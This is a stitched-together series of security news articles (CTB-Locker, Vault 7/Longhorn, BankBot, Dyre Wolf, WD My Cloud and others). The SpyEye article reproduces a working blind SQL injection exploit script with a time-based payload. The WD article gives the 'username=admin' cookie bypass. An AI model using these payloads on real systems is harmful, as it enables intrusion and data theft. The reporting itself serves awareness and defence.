Currently, there are three Command and Control servers for CTB-Locker for Websites uncovered by the researchers:
The ransomware also gives a timeslot for the website administrators to recover the files. However, failure to pay the BTC in time would double the ransom amount by 0.8 BTC.
CTB-Locker for Windows
CTB-Locker for Websites isn't the only latest development with this family of ransomware. The ransomware has come to the Windows environment by using executables code signed with a stolen certificate.
Usually, the purpose of digital signature is to authenticate the public about the genuinity of the products. The certificates are provided only after a background check conducted by the Certificate Authorities (CA) like Verizon, DigiCert.
But the cybercriminal group behind the CTB-Locker ransomware has tampered the genuinity of digital certificates. The executable version in the Windows of the CTB Ransomware comes with a pre-signed digital signature.
Uses Encryptor Raas For Code-Signing Certificate
The group behind CBT believed to had taken the advantage of Jeiphoos, another ransomware developer who lets people go to his ""Encryptor RaaS"" Tor site that provides free digital signature certificates and sign any executable using stolen code-signing certificate.
The act of stealing digital signatures is not new as they are included in the frames from the past years.
Hijacking a company website would economically affect the services that are being offered to users via websites, elevating the issue to another level. However, the major part lies in the POS (Point of Sale) attack, if the threat infects an e-commercial website.
Currently, many websites had been compromised by ""CBT-Locker for Website."" As per the analysis, many wordpress sites (most of the static web pages) has been found to be targeted by CBT Website Locker, according to this online blog.
Since this is not a serious issue like the Locky ransomware that utilizes Macros, the website administrator can make use of the untouched mirrors (backups) to bring back the site into action.
Symantec Connects 40 Cyber Attacks to CIA Hacking Tools Exposed by Wikileaks,https://thehackernews.com/2017/04/cia-longhorn-hacking.html,"Security researchers have confirmed that the alleged CIA hacking tools recently exposed by WikiLeaks have been used against at least 40 governments and private organizations across 16 countries.
Since March, as part of its ""Vault 7"" series, Wikileaks has published over 8,761 documents and other confidential information that the whistleblower group claims came from the US Central Intelligence Agency (CIA).
Now, researchers at cybersecurity company Symantec reportedly managed to link those CIA hacking tools to numerous real cyber attacks in recent years that have been carried out against the government and private sectors across the world.
Those 40 cyber attacks were conducted by Longhorn — a North American hacking group that has been active since at least 2011 and has used backdoor trojans and zero-day attacks to target government, financial, energy, telecommunications, education, aerospace, and natural resources sectors.
Although the group's targets were all in the Middle East, Europe, Asia, and Africa, researchers said the group once infected a computer in the United States, but an uninstaller was launched within an hour, which indicates the ""victim was infected unintentionally.""
What's interesting is that Symantec linked some of CIA hacking tools and malware variants disclosed by Wikileaks in the Vault 7 files to Longhorn cyber espionage operations.
Fluxwire (Created by CIA) ≅ Corentry (Created by Longhorn)
Fluxwire, a cyber espionage malware allegedly created by the CIA and mentioned in the Vault 7 documents, contains a changelog of dates for when new features were added, which according to Symantec, closely resemble with the development cycle of ""Corentry,"" a malware created by Longhorn hacking group.
""Early versions of Corentry seen by Symantec contained a reference to the file path for the Fluxwire program database (PDB) file,"" Symantec explains. ""The Vault 7 document lists removal of the full path for the PDB as one of the changes implemented in Version 3.5.0.""
""Up until 2014, versions of Corentry were compiled using GCC [GNU Compiler Collection]. According to the Vault 7 document, Fluxwire switched to an MSVC compiler for version 3.3.0 on February 25, 2015. This was reflected in samples of Corentry, where a version compiled on February 25, 2015, had used MSVC as a compiler.""
Similar Malware Modules
Another Vault 7 document details 'Fire and Forget' specification of the payload and a malware module loader called Archangel, which Symantec claims, match almost perfectly with a Longhorn backdoor called Plexor.
""The specification of the payload and the interface used to load it was closely matched in another Longhorn tool called Backdoor.Plexor,"" says Symantec.
Use of Similar Cryptographic Protocol Practices
Another leaked CIA document outlined cryptographic protocols that should be used within malware tools, such as using AES encryption with a 32-bit key, inner cryptography within SSL to prevent man-in-the-middle attacks, and key exchanges once per connection.
One leaked CIA document also recommends using of in-memory string de-obfuscation and Real-time Transport Protocol (RTP) for communicating with the command and control (C&C) servers.
According to Symantec, these cryptographic protocol and communication practices were also used by Longhorn group in all of its hacking tools.
More About LongHorn Hacking Group
Longhorn has been described as a well-resourced hacking group that works on a standard Monday to Friday working week — likely a behavior of a state-sponsored group — and operates in an American time zone.
Longhorn's advanced malware tools are specially designed for cyber espionage with detailed system fingerprinting, discovery, and exfiltration capabilities. The group uses extremely stealthy capabilities in its malware to avoid detection.
Symantec analysis of the group's activities also shows that Longhorn is from an English speaking North American country with code words used by it referring, the band The Police with code words REDLIGHT and ROXANNE, and colloquial terms like ""scoobysnack.""
Overall, the functionality described in the CIA documents and its links to the group activities leave ""little doubt that Longhorn's activities and the Vault 7 documents are the work of the same group.""
"Vulnerability Discovered in SpyEye Botnet, Exploit Available for Download",https://thehackernews.com/2011/09/vulnerability-discovered-in-spyeye.html,"Vulnerability Discovered in SpyEye Botnet, Exploit Available for Download
Blind SQL injection Vulnerability Discovered in SpyEye Botnet by S4(uR4 ( r00tw0rm.com )
Exploit :
Vulnn type : Blind SQL injection
vuln script : frm_cards_edit.php
Affected version : ALL
May use any botnet from : https://spyeyetracker.abuse.ch/monitor.php
What is SpyEye ?
Aliases : This is a list of aliases for the variant of SpyEye discovered in early February 2011 that has been actively targeting Norwegian banking websites:
Trojan-Spy.Win32.SpyEyes.evg (Kaspersky)
PWS-Spyeye.m (McAfee)
Trojan:Win32/EyeStye.H (Microsoft)
A variant of Win32/Spy.SpyEye.CA (NOD32)
W32/Malware.QOOC (Norman)
Trojan.Zbot (Symantec)
Mal_Xed-24 (Trend Micro)
Brief overview
SpyEye is a trojan with backdoor capabilities that attempts to steal sensitive information related to online banking and credit card transactions from an infected machine. SpyEye is sold via its author in an easy to configure kit form, which contains the trojan executable itself, command and control (C&C) server and basic configuration for targeting banking websites. As of the beginning of 2011, SpyEye has merged functionality from the ZeuS trojan family, which has been sold to the SpyEye author, and is now becoming more sophisticated with respect to the features and functionality offered.
SpyEye can potentially utilise a number of techniques in order to obtain a users online banking credentials, typically employing a phishing-style attack by presenting a faked logon web page, which is usually based on the original logon page from the bank, but that has additional HTML form fields and JavaScript inserted within, in order to obtain logon credentials that are not normally part of the logon process, such as PIN/TAN codes. A copy of the HTTP POST request is sent to the SpyEye C&C server, from which an attacker can extract the banking credentials or credit card details, and start conducting their own fraudulent transactions.
Download Exploit
Exploit Preview :
Spyeye_r0073r /dir/""version()""
if len(argv)<=3: exit() else: print ""[+]Started pwn..."" host = argv[1] path = argv[2] sql = argv[3] port = 80 hash = """" full = [] for k in range(48,122): full.append(k) full.append(0) # full value [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0] # This is the charset to try delay = 0.5 a=1 while a <= 32: for i in full: j = 0 if i == 0: exit('\n[+]Finished\n') # start = time() # start time for the delay conn = HTTPConnection(host,port) #values = { ""id"" : ""1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)=""K""),BENCHMARK(9000000,SHA1(1)),1));-- /*"" } values = { ""id"" : ""1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING(("" + sql + ""),"" + str(j) + "",1)),0)="" + str(i) + ""),BENCHMARK(9000000,SHA1(1)),1));-- /*"" } data = urllib.urlencode(values) print data conn.request(""GET"", path + ""frm_cards_edit.php?"" + data ) response = conn.getresponse() read = response.read() print read if response.status == 404: exit('[+]404') #404 now = time() if now - start > delay:
#has come true then the character is valid
hash += chr(i)
a += 1
else: j += 1
print ""i vale %s, y J vale %s"" %(i,j)
BankBot Returns On Play Store – A Never Ending Android Malware Story,https://thehackernews.com/2017/11/bankbot-android-malware.html,"Even after so many efforts by Google for making its Play Store away from malware, shady apps somehow managed to fool its anti-malware protections and infect people with malicious software.
A team of researchers from several security firms has uncovered two new malware campaigns targeting Google Play Store users, of which one spreads a new version of BankBot, a persistent family of banking Trojan that imitates real banking applications in efforts to steal users' login details.
BankBot has been designed to display fake overlays on legitimate bank apps from major banks around the world, including Citibank, WellsFargo, Chase, and DiBa, to steal sensitive information, including logins and credit card details.
With its primary purpose of displaying fake overlays, BankBot has the ability to perform a broad range of tasks, such as sending and intercepting SMS messages, making calls, tracking infected devices, and stealing contacts.
Google removed at least four previous versions of this banking trojan from its official Android app store platform earlier this year, but BankBot apps always made their ways to Play Store, targeting victims from major banks around the world.
The second campaign spotted by researchers not only spreads the same BankBot trojan as the first campaign but also Mazar and Red Alert. This campaign has been described in detail on ESET blog.
According to an analysis performed by the mobile threat intelligence team at Avast in collaboration with ESET and SfyLabs, the latest variant of BankBot has been hiding in Android apps that pose as supposedly trustworthy, innocent-looking flashlight apps.
First spotted by the researchers on 13 October, the malicious BankBot apps uses special techniques to circumvent Google's automated detection checks, such as starting malicious activities 2 hours after the user gave device admin rights to the app and publishing the apps under different developer names.
After tricking victims into downloading them, the malicious apps check for the applications that are installed on the infected device against a hard-coded, list of 160 mobile apps.
According to the researchers, this list includes apps from Wells Fargo and Chase in the U.S., Credit Agricole in France, Santander in Spain, Commerzbank in Germany and many other financial institutions from around the world.
If it finds one or more apps on the infected smartphone, the malware downloads and installs the BankBot APK from its command-and-control server on the device, and tries to trick the victim into giving it administrator rights by pretending to be a Play Store or system update using a similar icon and package name.
Once it gets the admin privileges, the BankBot app displays overlay on the top of legitimate apps whenever victims launch one of the apps from the malware's list and steal whatever banking info the victim's types on it.
The Avast Threat Labs has also provided a video demonstration while testing this mechanism with the app of the local Czech Airbank. You can see how the app creates an overlay within milliseconds and tricks the user into giving out their bank details to criminals.
Since many banks use two-factor-authentication methods for secure transactions, BankBot includes functionality that allows it to intercept text messages, allowing criminals behind BankBot to steal mobile transaction number (mTAN) sent to the customer's phone and transfer money to their accounts.
Here's one important thing to note is that Android mechanism blocks apps installation from outside the Play Store. Even if you have already permitted installation from unknown sources, Google still requires you to press a button to continue such installations.
""Unlike this newer version of BankBot, droppers from previous campaigns were far more sophisticated,"" the researchers note. ""They applied techniques such as performing clicks in the background via an Accessibility Service to enable the installation from unknown sources.""
The latest BankBot version does not utilize this Accessibility Service feature due to Google's recent move of blocking this feature for all applications, except those designed to provide services for the blind.
Google has already removed all recently-discovered BankBot apps after being notified by the researchers.
Although it is a never-ending concern, the best way to protect yourself is always to be vigilant when downloading apps even from Google's official Play store. So, always verify app permissions and reviews before downloading an app from Google Play Store.
Even though the BankBot apps made it way into the Play Store, its payload was downloaded from an external source. So, don't allow any unknown third-party APK to be installed on your smartphone.
To do so, Go to Settings → Security and then Turn OFF ""Allow installation of apps from sources other than the Play Store.""
Most importantly, be careful which apps you give administrative rights to, as it is powerful and can provide a full app control of your device.
Ransomware Attacks Threaten Wearable Devices and Internet of Things,https://thehackernews.com/2015/08/ransomware-android-smartwatch.html,"Are you a proud owner of a Smartwatch, a Smart TV, a Smart fridge, a Smart lock, an Internet-enabled car, or live in a smart city?
Recently, it has been reported that the growth of the Internet of Things would eventually lead to cyber criminals in making lots of money, as they started attacking the Internet of Things for Ransom.
Yes, the latest Interest of the cyber criminals in the field of Internet of Things is 'Ransomware'.
Internet of Things (IoT) such as Android and iOS-based wearable Smartwatches and the concept of connected homes has now given a treat to the current generation Ransomware.
With the advancements in Technology, cyber criminals are simultaneously promoting themselves from the threat known for restricting computers or encrypting files and asking users for money in return for gaining back access to their systems.
From computers to mobile phones, now criminals are targeting the IoT and the wearables devices.
Security researchers at Symantec demonstrated how an Android Wear device might be impacted by typical Android ransomware.
In order to conduct this test, the researchers simply repackaged a current Android ransomware app (.apk file) – dubbed ""Android.Simplocker"", inside a new Android Wear project.
Next, they took a Moto 360 Smartwatch and paired it with an Android phone. When they installed the new .apk file on the phone, they found that the phone became infected with the ransomware.
As the Smartwatch and an Android phone are required to be paired via Bluetooth for wireless connectivity, the ransomware also got pushed onto the smartwatch once the pairing of both the devices were done.
Once installed on the smartwatch, the malware could be easily activated by the user if they were tricked into running it, by clicking on a malicious app.
After installation, the ransomware will cause the smartwatch to become unresponsive and unusable!
Simplocker Android ransomware then checks for the display of the ransom message every second, and if it is not shown, will push it onto the screen again.
In addition, Simplocker encrypts a range of different files stored on the smartwatch's SD card.
Now, you must be thinking of escaping from the situation?
You can recover from this situation, but unfortunately, it involves a factory reset of your smartwatch.
But there also stands a condition where the rebooting of the device through hardware buttons is possible, then quickly navigating to the factory reset setting (within 20-30 seconds) before the ransomware is rebooted.
According to Symantec, while this would erase all files on the smartwatch, those files would have been encrypted by the malware in the first place.
For this one needs to keep an updated backup.
No such ransomware has been seen yet, but the day is not far when this becomes a reality.
As, in the past it was evident how smart Televisions got attacked with the ransomware also IoT devices being remotely controlled by the attacker.
Therefore, the crux is that the users need to be more vigilant and even smarter than the technology they are dependent on.
Duuzer Trojan: A New Backdoor Targeting South Korean Organizations,https://thehackernews.com/2015/10/computer-malware-attack.html,"Security researchers at Symantec have uncovered a new Backdoor Trojan that grants hackers remote access and some control over infected machines.
""Duuzer,"" as dubbed by the researchers, has been targeting organizations in South Korea and elsewhere in an attempt to steal valuable information.
The Trojan is designed to infect both 32-bit and 64-bit computers running Windows 7, Windows Vista, and Windows XP.
Duuzer gives attackers remote access to the compromised computer, allowing them to:
Collect system and drive information
Create, enumerate, and end processes
Access, modify and delete files
Upload and Download additional files
Change the time attributes of files
Execute malicious commands
Steal data from infected system
Know about victim's Operating System
Duuzer Infects via Spear Phishing or Watering Hole Attacks
It is currently unclear how the malware is being distributed, but according to Symantec Researchers, the most obvious routes are Spear Phishing campaigns and Watering Hole attacks.
Once infected, Duuzer checks if the system is running on a virtual machine like VMWare or Virtual Box to ensure that security researchers are not analyzing the malware before performing its malicious routines.
Moreover, the Trojan identifies the existing software configured to run on startup and takes the name of that legitimate software on an infected computer and spread across the system.
Duuzer's first sets up a backdoor on the machine, allowing attackers physical access to the system.
The attackers then manually run commands through the backdoor on affected computers. They can perform a variety of operations mentioned above.
""Based on our analysis of Duuzer, the attackers behind the threat appear to be experienced and have knowledge about security researchers' analysis techniques,"" researchers said. ""Their motivation seems to be obtaining valuable information from their targets' computers.""
'Brambul' Worm and 'Joanap' Trojan also Detected
Research also discovered a dropper that infects computers with a worm known as Brambul and a Backdoor Trojan called Joanap. Both of them mostly work together and typically used to log and monitor infected systems remotely.
It is still unclear how the dropper is being distributed; however, it is believed that it comes from malicious emails.
The worm detected as W32.Brambul uses brute-force attacks via the Server Message Block (SMB) protocol to spread from one computer to another.
Once infected, the Brambul worm connects to random IP addresses on the local network and authenticates itself through SMB using common passwords, like 'password,' 'login,' '123123,' 'abc123' and 'iloveyou.'
Besides attacking other computers via SMB, Brambul creates a network share on compromised computers, usually the system drive, and then sends the computer's details and login credentials to a predefined email address.
Connection between Duuzer, Brambul and Joanap
According to Symantec, Duuzer has a connection with both Joanap and Brambul...But how?
Once infected, Brambul drops other pieces of malware on infected machines, either Duuzer or Joanap.
Systems infected with Brambul have been used as command-and-control (CnC) servers for Duuzer and have also been compromised with Duuzer.
If Joanap is dropped, the Trojan will register itself as a local OS service, named ""SmartCard Protector."" The Trojan opens a backdoor on the compromised machine and starts:
Sending specific files to the attackers
Saving or deleting files
Downloading and executing files
Executing or terminating processes
Propagating instructions it receives from the C&C server
How to get rid of this ARMY?
Though Duuzer, Brambul, and Joanap are just a small selection of many threats affecting South Korean organizations with a very low-risk level.
But still, it is recommended for the users and businesses to keep themselves safe and protected by following these steps and prevent their systems from being compromised with this malware:
Use a firewall to block all incoming connections from the Internet to services that shouldn't be publicly available.
You should, by default, deny all incoming connections and only allow services you explicitly want to offer to the outside world.
Use Complex Passwords as it makes it difficult to crack.
Turned OFF Bluetooth if it is not required for mobile devices. Also, turn off other services not required at present.
Train your employees not to open email or messages attachments unless they are expecting them.
For more details, head on the Symantec's official blog.
Dyre Wolf Banking Malware Stole More Than $1 Million,https://thehackernews.com/2015/04/dyre-wolf-banking-malware.html,"Security researchers have uncovered an active cyber attack campaign that has successfully stolen more than $1 Million from a variety of targeted enterprise organizations using spear phishing emails, malware and social engineering tricks.
The campaign, dubbed ""The Dyre Wolf"" by researchers from IBM's Security Intelligence division, targets businesses and organizations that use wire transfers to transfer large sums of money, even if the transaction is protected by 2-factor authentication.
Nowadays, cybercriminals not only rely on banking Trojans to harvest financial credentials, but also using sophisticated social engineering tactics to attack big corporations that frequently conduct wire transfers to move large sums.
""An experienced and resource-backed [cyber criminal] gang operates Dyre,"" John Kuhn, Senior Threat Researcher at IBM Managed Security Service, wrote in a blog post published Thursday.
""[Dyre] was used in wide-stroke [cyber] attacks for the past year and has now moved into a more [indecent] stage of attacking corporate accounts via the incorporation of skilled social engineering schemes.""
In addition to the advanced social engineering tricks, the Dyre criminal gang also employs distributed denial-of-service (DDoS) attacks against the targeted bank or businesses in order to distract attention and resources from the theft and to prevent victims from logging into the bank account until it was too late.
The attack starts with a spear phishing email reaches into your organization with an attachment claiming to be a document of financial importance, like an invoice, but is actually an 'Upatre downloader'.
Once opened, Upatre downloads and executes the Dyre Trojan into the victim's system which, according to IBM researchers, went undetected by the majority of antivirus software programs.
Dry Trojan has capability to hijack victim's address book and send out mass emails to all of them via Outlook. The malware then monitors victim's activities and waits for further action.
The process gets interesting when the victim with an infected computer tries to log into one of the hundreds bank sites which the trojan is programmed to monitor, Dyre displays new screen with a message stating that the site is experiencing some issues and that you must call the number provided to make the transaction.
Once you call the number given, you'll assisted by a real person, not an automated one. This is the uniqueness and the extent of social engineering trick used by Dyre attackers that use real persons as the part of their attack.
The attackers then retrieve all the information from the victim, and as soon as the victim hangs up the phone, the wire transfer is made by the crooks on the other end of the phone.
At the time, when the money is being bounced from bank to bank to circumvent detection by the bank and law enforcement, the targeted organization's website will be subjected to a DDoS attack. The idea behind the DDoS attack is to prevent the victim from accessing the bank account.
IBM security researchers recommend the following steps to users in order to protect against the attack:
Organizations should train its employees on security best practices.
Conduct periodic mock phishing exercises where employees receive emails or attachments that simulate a malicious behavior. Then using that findings, discuss the growing security threats with them.
Provide security trainings to its employees in order to help understand threats and measures they can take to protect their organization.
Regular reminders on phishing and spam campaigns should be provided to employees in order to prevent them to open any suspicious attachments or links.
As the banks never ask for banking credentials, employees should be trained to never provide this information to anyone.
The Dyre Wolf campaign has already ripped off organizations for $500,000 (€450,000) and more than $1 Million (€910,000) per attack. However, this much large sums of money are not transferred without alarming the organizations, but cybercriminals have focused only on those banks that transfer large sums of money without triggering alarms.
Searching for Leaked Celebrity Photos? Don't Blindly Click that Fappening Link!,https://thehackernews.com/2017/03/fappening-leaked-photos.html,"Are you curiously googling or searching torrents for photos or videos of Emma Watson, Amanda Seyfried, Rose McGowan, or any other celebrities leaked in The Fappenning 2.0?
If yes, then beware, you should not click any link promising Fappenning celebrity photos.
Cybercriminals often take advantage of news headlines in order to trap victims and trick them into following links that may lead to websites containing malware or survey scams.
Last week, a few private photos of Emma Watson and Amanda Seyfried — ranging from regular selfies to explicitly sexual photos — were circulating on the Internet forums, including Reddit and 4chan, with UK's TV presenter Holly Willoughby and US actor Rose McGowan among the latest alleged victims.
Now, according to the security researchers from MalwareBytes, scammers are exploiting this new batch of leaked celebrity photos and videos by using their stolen selfies to lure victims on social media sites and making dollars.
Also Read: Hackers Threaten to Remotely Wipe 300 Million iPhones Unless Apple Pays Ransom
One of the scam campaigns uncovered by MalwareBytes targets Twitter users, promising them to follow mentioned links to access leaked embarrassing private photos of British WWE star Paige – whose intimate photos and videos, among other celebs, were leaked online last week without her permission in an act dubbed ""The Fappening 2.0.""
The Fappening 2.0 is named after similar leaks in 2014 when some anonymous hackers flooded the Internet with private photographs of Jennifer Lawrence, Kim Kardashian, Kate Upton and many hundreds of other celebrities by hacking their Apple's iCloud accounts.
Don't Install Any App To View Leaked Fappening Images — It's a Malware!
The latest scams spreading on Twitter read:
""VIDEO: WWE Superstar Paige Leaked Pics and Videos""
""Incredible!!! Leaked Pics and Videos of WWE Superstar Paige!!!!: [url] (Accept the App First)""
For accessing the content, scammers told you to first install a twitter app called ""Viral News."" In the hope of a glimpse of Paige's video, victims tricked into giving the malicious app permission to access their Twitter account, update their profile and post tweets on their behalf.
Once the app is installed, you are then sent to a site that serves no purpose other than enabling crooks to make money from affiliate marketing and advertising link clicks.
The site quickly grays out, asking you to click yet another link that eventually lands you on a survey page that promises to reward you with an Amazon gift card as soon as you hand over your details.
""Suffice to say, filling this in hands your personal information to marketers – and there is no guarantee you will get any pictures at the end of it,"" said Chris Boyd, a malware intelligence analyst at Malwarebytes.
Malware Hijacks Twitter Accounts to Spread Fappening Spam
While you are looking through all these links, the creepy app spams out the same tweets from your account, leading your followers to the same The Fappening 2.0 scam you fell for.
So far nearly 7,000 users have become a victim of the latest scam.
""As freshly leaked pictures and video of celebrities continue to be dropped online, so too will scammers try to make capital out of image-hungry clickers. Apart from the fact that these images have been taken without permission so you really shouldn't be hunting for them, anyone going digging on less than reputable sites is pretty much declaring open season on their computers,"" Boyd concluded.
Here are some useful tips you can follow in an effort to protect yourself from scams shared through social media:
Don't take the bait. Stay away from promotions of ""exclusive,"" ""shocking"" or ""sensational"" photos or footage. If it sounds too outlandish to be true, it is probably a scam.
Hover over links to see their real destination. Before you click on any link, mouseover the link to see where it'll take you. Do not click on links leading to unfamiliar sites.
Don't trust your friends online. It might not actually be your friends who are liking or sharing scam links to photos. Their account may have been hijacked by scammers.
Raise your Eyebrows when asked for something in return. Beware of any site that asks you to download and install software in order to view anything else, in this case, photos and videos of Paige. This is a known tactic of spreading scam.
"Russian Who Hacked LinkedIn, Dropbox Sentenced to 7 Years in Prison",https://thehackernews.com/2020/10/russian-linkedin-hacker.html,"A Russian hacker who was found guilty of hacking LinkedIn, Dropbox, and Formspring over eight years ago has finally been sentenced to 88 months in United States prison, that's more than seven years by a federal court in San Francisco this week.
Yevgeniy Aleksandrovich Nikulin, 32, of Moscow hacked into servers belonging to three American social media firms, including LinkedIn, Dropbox, and now-defunct social-networking firm Formspring, and stole data on over 200 million users.
Between March and July 2012, Nikulin hacked into the computers of LinkedIn, Dropbox, and Formspring, and installed malware on them, which allowed him to remotely download user databases of over 117 Million LinkedIn users and more than 68 Million Dropbox users.
According to the prosecutor, Nikulin also worked with unnamed co-conspirators of a Russian-speaking cybercriminal forum to sell customer data he stole as a result of his hacks.
Besides hacking into the three social media firms, Nikulin has also been accused of gaining access to LinkedIn and Formspring employees' credentials, which helped him carry out the computer hacks.
""The Court also found that Automattic, parent company of Wordpress.com, was the victim of an intrusion by defendant, although there was no evidence that defendant stole any customer credentials,"" the Justice Department said.
Nikulin was arrested in Prague on October 5, 2016, by Interpol agents working in collaboration with the FBI, and extradited to the United States in March 2018 after a long extradition battle between the U.S. and Russia.
In 2016, the hacker was charged with nine felony counts of computer intrusion, aggravated identity theft, causing damage to a protected computer, trafficking in unauthorized access devices, and conspiracy.
However, after a long delay of trials due to the coronavirus pandemic, Nikulin was found guilty by a federal jury of the United States in early July this year and was sentenced to 88 months in prison on September 29.
U.S. District Judge William H. Alsup convicted Nikulin of selling stolen usernames and passwords, installing malware on protected computers, conspiracy, computer intrusion, and aggravated identity theft.
Prior to the sentencing hearing on September 29, federal prosecutors sought a sentence of 145 months in prison, that's over 12 years in prison, three years of supervised release, and restitution.
Nikulin has been in U.S. custody since his extradition from the Czech Republic and will be serving his sentence effect immediately.
SSL Encryption — Securing Internet of Things (IoT),https://thehackernews.com/2015/08/ssl-encryption-internet-of-things.html,"Internet of Things (IoT) with the purpose of providing convenience to the users enabled every object in the universe to be as smart as a whip.
By assigning IP address to all sorts of devices, ranging from household appliances, machines, medical devices and sensors to other day-to-day objects, and putting them all together on a standardised network is a common Internet of Things (IoT) practice.
Is Internet of Things Secure?
In my previous articles, I gave you a glance of the most vulnerable smart cities that are increasingly adopting devices connected to the Internet in an attempt to add convenience and ease to daily activities.
By 2020, there will be more than 45 Billion Internet-connected devices that will transform the way we live and work.
The bottom line:
As the number of IoT enabled systems increases, the complexity of handling them increases; leading to an introduction of new risk and vulnerabilities associated with them.
Security of Internet of Things (IoT) Can't Be Ignored
The risks can be mitigated by more robust authentication methods at the time when the 'Internet-connected devices' initiate communication with each other, hence developing secure identification management.
For secure communication among the IoT devices, many security mechanisms and protocols have been implemented, including:
Public Key Infrastructure (PKI) system for securing communications between the Internet-connected devices.
Secure Socket Layer (SSL) protocol implementation for IoTs to encrypt their communication over the network.
As it is evident, Security solutions for embedded devices connected to the Internet is also necessary. The devices also need to be secured from attacks like eavesdropping, DDoS and tampering of network traffic.
SSL Encryption for Internet of Things (IoT)
For SSL/TLS implementation in IoT devices, INSIDE Secure has introduced a new open source embedded SSL called MatrixSSL Tiny as an extension to MatrixSSL - a source for web servers to implement encryption layer for secure management of remote devices.
MatrixSSL Tiny is going to be demonstrated this week at Black Hat conference in Las Vegas, where the security researchers will be representing its full suite of security products and will talk about its solution for cyber attacks focussed at IoT.
MatrixSSL Tiny is a lightweight TLS software implementation for IoT devices with limited memory to make secure communications among them, yet demand more robust security to prevent eavesdropping and tampering of network traffic.
The software also performs real time functions that nulls the memory on completion of a particular session. According to researchers, MatrixSSL Tiny is the world's smallest, yet powerful IoT security solution.
Why SSL is Not Sufficient?
Despite developments for enhancing the security, IoT infrastructure is still massively prone to cyber attacks that lead to offer open gateways for people with malicious intents.
Any command initiated on a smart device, be it an application or a firmware, must be verified through a chain of trust.
If we consider a situation, where communication is taking place on a traditional IT system and an IoT smart device, we see that IT systems follow a layered security procedure; whereas in IoT smart devices authenticity and confidentiality can be tampered with.
Therefore, multi-layer security measures are needed for IoT devices too so that the IoT devices could differentiate that the information received or sent is by an authorized user or an intruder.
To sum up, I would say…
The security of IoT enabled devices are becoming critical and a thing of concern for the security enablers. The point to be worried about is its future developments where, it is seen as a boon and not a bane.
Warning! 32 Million Twitter Passwords May Have Been Hacked and Leaked,https://thehackernews.com/2016/06/hack-twitter-password.html,"The world came to know about massive data breaches in some of the most popular social media websites including LinkedIn, MySpace, Tumblr, Fling, and VK.com when an unknown Russian hacker published the data dumps for sale on the underground black marketplace.
However, these are only data breaches that have been publicly disclosed by the hacker.
I wonder how much more stolen data sets this Russian, or other hackers are holding that have yet to be released.
The answer is still unknown, but the same hacker is now claiming another major data breach, this time, in Twitter.
Login credentials of more than 32 Million Twitter users are now being sold on the dark web marketplace for 10 Bitcoins (over $5,800).
LeakedSource, a search engine site that indexes leaked login credentials from data breaches, noted in a blog post that it received a copy of the Twitter database from Tessa88, the same alias used by the hacker who provided it hacked data from Russian social network VK.com last week.
The database includes usernames, email addresses, sometimes second email addresses, and plain-text passwords for more than 32 Million Twitter accounts.
Twitter strongly denied the claims by saying that ""these usernames and credentials were not obtained by a Twitter data breach"" – their ""systems have not been breached,"" but LeakedSource believed that the data leak was the result of malware.
""Tens of millions of people have become infected by malware, and the malware sent every saved username and password from browsers like Chrome and Firefox back to the hackers from all websites including Twitter,"" LeakedSource wrote in its blog post.
But, do you remember how Facebook CEO Mark Zuckerberg Twitter account was compromised?
The hackers obtained Zuck's account credentials from the recent LinkedIn data breach, then broke his SHA1-hashed password string, tried on his several social media accounts and successfully hacked Zuckerberg's Twitter and Pinterest account.
So, one possibility could also be that the alleged Twitter database dump of over 32 Million users is made up of already available records from the previous LinkedIn, MySpace and Tumblr data breaches.
The hacker might just have published already leaked data from other sites and services as a new hack against Twitter that actually never happened.
Whatever the reason is, the fact remain that hackers may have had their hands on your personal data, including your online credentials.
So, it's high time you changed your passwords for all social media sites as well as other online sites if you are using the same password.
Western Digital's My Cloud NAS Devices Turn Out to Be Easily Hacked,https://thehackernews.com/2018/09/wd-my-cloud-nas-hacking.html,"Security researchers have discovered an authentication bypass vulnerability in Western Digital's My Cloud NAS devices that potentially allows an unauthenticated attacker to gain admin-level control to the affected devices.
Western Digital's My Cloud (WD My Cloud) is one of the most popular network-attached storage (NAS) devices which is being used by businesses and individuals to host their files, as well as backup and sync them with various cloud and web-based services.
The WD My Cloud devices let users not only share files in a home network but its private cloud feature also allows them to access their data from anywhere around the world at any time.
However, security researchers at Securify have discovered an authentication bypass vulnerability on the WD My Cloud NAS boxes that could allow unauthenticated attackers with network access to the device to escalate their privileges to admin-level without needing to provide a password.
This would eventually allow attackers to run commands that would typically require administrative privileges and gain complete control of the affected NAS device, including their ability to view, copy, delete and overwrite any files that are stored on the device.
Here's How Easy it is to Hack a WD My Cloud Storage Boxes
The vulnerability, designated CVE-2018-17153, resides in the way WD My Cloud creates an admin session tied to an IP address.
By simply including the cookie username=admin to an HTTP CGI request send by an attacker to the device's web interface, the attacker can unlock admin access and gain access to all the content stored on the NAS box.
""It was found that it is possible for an unauthenticated attacker to create a valid session without requiring to authenticate,"" the researchers explain in a blog post detailing about the flaw published on Tuesday.
""The network_mgr.cgi CGI module contains a command called cgi_get_ipv6 that starts an admin session that is tied to the IP address of the user making the request when invoked with the parameter flag equal to 1. Subsequent invocation of commands that would normally require admin privileges are now authorized if an attacker sets the username=admin cookie.""
Long story short, just tell the WD My Cloud NAS device that you are the admin user in the cookie, and you are in without ever being asked for a password.
Proof-of-Concept Exploit Code Released
Securify researchers have also published a proof-of-concept (PoC) exploit showing how the vulnerability can be exploited with just a few lines of code.
Obviously, the exploit requires either a local network or internet connection to a WD My Cloud device in order to be run the command and bypasses the NAS device's usual login requirements.
The researchers successfully verified the vulnerability on a Western Digital My Cloud model WDBCTL0020HWT running firmware version 2.30.172, though they claimed that this issue is not limited to the model, as most products in the My Cloud series share the same ""vulnerable"" code.
Securify researchers found the issue while reverse engineering the CGI binaries to look for security bugs, and reported it to Western Digital in April 2017, but did not receive any response from the company.
After almost one-and-half years of silence from Western Digital, researchers finally publicly disclosed the vulnerability, which is still unpatched.
This is not the first time Western Digital has ignored the security of its My Cloud NAS device users.
Earlier this year, a researcher publicly disclosed several vulnerabilities in Western Digital's My Cloud NAS devices, including a hard-coded password backdoor issue in their firmware after the company did not address the issue, which was reported 180 days before making it public.
